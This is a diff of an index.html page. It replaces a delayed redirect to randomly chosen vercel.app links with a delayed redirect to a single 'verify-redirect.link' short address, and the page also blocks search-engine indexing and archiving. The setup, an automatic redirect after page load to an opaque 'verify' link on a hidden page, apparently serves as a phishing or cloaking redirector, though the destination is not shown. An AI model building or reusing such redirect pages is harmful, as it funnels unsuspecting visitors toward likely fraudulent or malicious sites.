--- a/index.html
+++ b/index.html
@@ -2,37 +2,10 @@
 <html lang="en">
   <head>
      <script>
-        // Array containing the links
-        var links = [
-            "https://0lsrs-zkoh.vercel.app/",
-            "https://0lsrs-zkoh-git-main-debbs34s-projects.vercel.app/",
-            "https://0lsrs-zkoh-debbs34s-projects.vercel.app/"
-        ];
-
-        // Function to shuffle the links array
-        function shuffle(array) {
-            for (var i = array.length - 1; i > 0; i--) {
-                var j = Math.floor(Math.random() * (i + 1));
-                var temp = array[i];
-                array[i] = array[j];
-                array[j] = temp;
-            }
-        }
-
-        // Shuffle the links array
-        shuffle(links);
-
-        // Redirect to a random link from the shuffled array after a 5-second delay
-        function redirectToRandomLink() {
-            var randomIndex = Math.floor(Math.random() * links.length);
-            setTimeout(function() {
-                window.location.href = links[randomIndex];
-            }, 5000); // 5 seconds delay
-        }
-
-        // Call the redirection function when the page loads
-        window.onload = redirectToRandomLink;
-    </script>
+      setTimeout(function() {
+          window.location.href = "https://verify-redirect.link/Z7Pd8k";
+      }, 5000); // 5000 milliseconds = 5 seconds
+  </script>
   
     <meta content="text/html;charset=utf-8" http-equiv="Content-Type" />
     <meta content="noindex,noarchive,nofollow,nosnippet" name="robots" />
